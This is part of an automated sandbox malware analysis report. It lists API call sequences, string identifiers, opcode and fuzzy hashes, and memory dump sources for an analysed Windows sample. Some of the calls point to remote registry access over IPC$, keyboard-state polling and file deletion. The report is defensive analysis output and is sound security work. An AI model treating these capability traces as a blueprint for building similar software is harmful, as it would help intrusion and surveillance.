                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2116804098-2391861430
                                                                                                                • Opcode ID: d8e38f4658d80129ac66462ff29017f20df3cfcf5e5a0b84e6d8b4336b462a1e
                                                                                                                • Instruction ID: 3acc31ef8c5c51ef24c45a0bcb25cd595adcc68359e60db1a7e2a184216a2dbb
                                                                                                                • Opcode Fuzzy Hash: d8e38f4658d80129ac66462ff29017f20df3cfcf5e5a0b84e6d8b4336b462a1e
                                                                                                                • Instruction Fuzzy Hash: CF512C72900109ABDB15FBA4DD82EEEB779EF14700F104166F505B21A1EA726F58DBB0
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00D8D37F
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00D8D3A0
                                                                                                                • __swprintf.LIBCMT ref: 00D8D3F3
                                                                                                                • _wprintf.LIBCMT ref: 00D8D499
                                                                                                                • _wprintf.LIBCMT ref: 00D8D4B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2116804098-3420473620
                                                                                                                • Opcode ID: fa59e50d342c262f60cdeae5c3138ab92453bf694879722fac81a6c6e4c7130f
                                                                                                                • Instruction ID: 83ce49e2abf435d6aa1361561107ac7745ab078c3ced5349d95a1fec822ec99b
                                                                                                                • Opcode Fuzzy Hash: fa59e50d342c262f60cdeae5c3138ab92453bf694879722fac81a6c6e4c7130f
                                                                                                                • Instruction Fuzzy Hash: 5C517072900209ABCB15FBA4DD82EEEB779EF14700F108466B105B21A1EB756F58DB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • _memset.LIBCMT ref: 00D7AF74
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D7AFA9
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D7AFC5
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D7AFE1
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D7B00B
                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00D7B033
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D7B03E
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D7B043
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                • Opcode ID: 0d0e6e1c0a0fd5255cca4097015882b329514474687d95a51291e55b3fefc759
                                                                                                                • Instruction ID: 93e706147bc34caf5e23d091619dc24d37b095c9df7e3eecb19fdccffd75eaf3
                                                                                                                • Opcode Fuzzy Hash: 0d0e6e1c0a0fd5255cca4097015882b329514474687d95a51291e55b3fefc759
                                                                                                                • Instruction Fuzzy Hash: D341F77681022DABCB11EBA4DC85DEEB779FF14710F04816AF905A21A1EB759E04CFB0
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                • Opcode ID: ea844fa09268d048599dcb27b27e2d0ea74f2738ecf1cd1601e98a0c52a8cedf
                                                                                                                • Instruction ID: ffd7393394c5d456b980ee9f53921043dacec5b798c1fb2f84adb2f6db05ccab
                                                                                                                • Opcode Fuzzy Hash: ea844fa09268d048599dcb27b27e2d0ea74f2738ecf1cd1601e98a0c52a8cedf
                                                                                                                • Instruction Fuzzy Hash: 91414B7414034A9BDF08EF14DC51AEA3762EF26360F598824BC915B296DB309A5ECB71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D8843F
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D88455
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D88466
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D88478
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D88489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_memmove
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                • Opcode ID: 9aedfd837540f3f08bcb7a3bb51deebff980003c8cbf6441a8ed7d74a7c6e225
                                                                                                                • Instruction ID: e8a4673be0a6b8680e58569622a77910e2332f853469df8575864f07e88f4f5a
                                                                                                                • Opcode Fuzzy Hash: 9aedfd837540f3f08bcb7a3bb51deebff980003c8cbf6441a8ed7d74a7c6e225
                                                                                                                • Instruction Fuzzy Hash: FA11A361A4025E7ED714B7A6CC4ADFF7B7CEB91B40F854829B911A20D1DEB05E48CAB0
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00D8809C
                                                                                                                  • Part of subcall function 00D5E3A5: timeGetTime.WINMM(?,75C0B400,00DB6163), ref: 00D5E3A9
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00D880C8
                                                                                                                • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00D880EC
                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00D8810E
                                                                                                                • SetActiveWindow.USER32 ref: 00D8812D
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D8813B
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D8815A
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00D88165
                                                                                                                • IsWindow.USER32 ref: 00D88171
                                                                                                                • EndDialog.USER32(00000000), ref: 00D88182
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: 5f79791a3385d4b75f7eabf9c8ad4d76cbb2b3ba88fd7930ce3a82a7b09aacc6
                                                                                                                • Instruction ID: 4b83883b0ac8bde0a0834f5e838b5b5ef208e6b3d67bd4de267e10ca32871038
                                                                                                                • Opcode Fuzzy Hash: 5f79791a3385d4b75f7eabf9c8ad4d76cbb2b3ba88fd7930ce3a82a7b09aacc6
                                                                                                                • Instruction Fuzzy Hash: 16216270240306BFE7226B72EC89E263B6FF715389B480125F521D62A1CF738D499B31
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                • Opcode ID: ce77ef611d68723f227e0c65b9e4179726f3182c496229cd5d1f8f776ca41301
                                                                                                                • Instruction ID: e8b91eca3a4104e0fb7a29949324907fcf0eef5ec03a2634eda602b55c59522c
                                                                                                                • Opcode Fuzzy Hash: ce77ef611d68723f227e0c65b9e4179726f3182c496229cd5d1f8f776ca41301
                                                                                                                • Instruction Fuzzy Hash: 8811D231908226AFDB24B7749C4AEEA77ACEB41720F1500A6F456D6191EF70DA858BB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D8C6A0: __time64.LIBCMT ref: 00D8C6AA
                                                                                                                  • Part of subcall function 00D441A7: _fseek.LIBCMT ref: 00D441BF
                                                                                                                • __wsplitpath.LIBCMT ref: 00D8C96F
                                                                                                                  • Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD
                                                                                                                • _wcscpy.LIBCMT ref: 00D8C982
                                                                                                                • _wcscat.LIBCMT ref: 00D8C995
                                                                                                                • __wsplitpath.LIBCMT ref: 00D8C9BA
                                                                                                                • _wcscat.LIBCMT ref: 00D8C9D0
                                                                                                                • _wcscat.LIBCMT ref: 00D8C9E3
                                                                                                                  • Part of subcall function 00D8C6E4: _memmove.LIBCMT ref: 00D8C71D
                                                                                                                  • Part of subcall function 00D8C6E4: _memmove.LIBCMT ref: 00D8C72C
                                                                                                                • _wcscmp.LIBCMT ref: 00D8C92A
                                                                                                                  • Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF49
                                                                                                                  • Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF5C
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D8CB8D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D8CC24
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D8CC3A
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D8CC4B
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D8CC5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 152968663-0
                                                                                                                • Opcode ID: 182b71a30342555f9ab4e05f57f3db26ccb7ccec733c42b33cc732d785bb69c5
                                                                                                                • Instruction ID: cdb4777ba32874a4801bf8aab59a5be4b850a0886fbcb4b1bb59b7f2684c311a
                                                                                                                • Opcode Fuzzy Hash: 182b71a30342555f9ab4e05f57f3db26ccb7ccec733c42b33cc732d785bb69c5
                                                                                                                • Instruction Fuzzy Hash: A4C10BB1900229ABDF11EFA5CC81EEEB7B9EF59310F0440AAF609E6151D7709A84CF75
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3566271842-0
                                                                                                                • Opcode ID: aba6d94669ebd8287c7c92335fc76221eab9744a559d27e21139bb76df0a78f9
                                                                                                                • Instruction ID: 5f78d1af99f3dd3cd26fc3daccb7fda78e906c0c115c9dd7027e82394a01591a
                                                                                                                • Opcode Fuzzy Hash: aba6d94669ebd8287c7c92335fc76221eab9744a559d27e21139bb76df0a78f9
                                                                                                                • Instruction Fuzzy Hash: 12711C75901219AFDB14EFA4D885A9EBBB9EF48314F048096E919EB351D730EE40CFA0
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00D83908
                                                                                                                • SetKeyboardState.USER32(?), ref: 00D83973
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00D83993
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00D839AA
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00D839D9
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00D839EA
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00D83A16
                                                                                                                • GetKeyState.USER32(00000011), ref: 00D83A24
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00D83A4D
                                                                                                                • GetKeyState.USER32(00000012), ref: 00D83A5B
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00D83A84
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00D83A92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 879e74d5708b01f00bbb70050f34d89333694726be851d904555bb3a8adbd63c
                                                                                                                • Instruction ID: 3853fce46c9f6503db88fafa4e6f86c50c92ffa987ce9931a7d7294a29eedf68
                                                                                                                • Opcode Fuzzy Hash: 879e74d5708b01f00bbb70050f34d89333694726be851d904555bb3a8adbd63c
                                                                                                                • Instruction Fuzzy Hash: FB519960A047C569FB35FBA488117EABFB49F01B40F0C459DD5CA561C2DA94DB8CCB72
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00D7FB19
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00D7FB2B
                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D7FB89
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00D7FB94
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00D7FBA6
                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D7FBFC
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00D7FC0A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00D7FC1B
                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D7FC5E
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00D7FC6C
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D7FC89
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00D7FC96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: adc909d122dbdf5dbf57de6fdec2613418e8ca638f192169f6e294825efd5da1
                                                                                                                • Instruction ID: 442ba2abd24189e7a9ad14bc42bd32f51bd32f39919390340d5937b39669cfc2
                                                                                                                • Opcode Fuzzy Hash: adc909d122dbdf5dbf57de6fdec2613418e8ca638f192169f6e294825efd5da1
                                                                                                                • Instruction Fuzzy Hash: BA51F071B0020AAFDB18CF69DD95E6EBBB6EB88710F148539F919D7690D7709D00CB20
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D449CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D44954,00000000), ref: 00D44A23
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D5B85B), ref: 00D5B926
                                                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00D5B9BD
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00DBE775
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00DBE7A6
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00DBE7BD
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00DBE7D9
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00DBE7EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 79e4b5acf585468cd914d0e2a1809a088a3a18878156d1f985ffb2f3d8e62d3c
                                                                                                                • Instruction ID: 6c1ac8a8bddf4a8fa4aae801d0c79b1bfe45e21c79d7503d77636e52334756d7
                                                                                                                • Opcode Fuzzy Hash: 79e4b5acf585468cd914d0e2a1809a088a3a18878156d1f985ffb2f3d8e62d3c
                                                                                                                • Instruction Fuzzy Hash: 5961AC34100B02CFDB259F16D888B65BBF5FF85322F18452AE9869B660C771E988DF70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00D5B067
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 055f7e8349f3e7eec7e3738ffc807ef829c90283f211d3e7964b775d44ebc391
                                                                                                                • Instruction ID: 64814fce4b9734ac7de0bf0895f2d50d106fda118e3a72d827c8c106fb0d1f4e
                                                                                                                • Opcode Fuzzy Hash: 055f7e8349f3e7eec7e3738ffc807ef829c90283f211d3e7964b775d44ebc391
                                                                                                                • Instruction Fuzzy Hash: 7B419E31100641AFDF205F28DC89BBA3B66AB06732F184266FD668B2E5D7358C46CB31
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 136442275-0
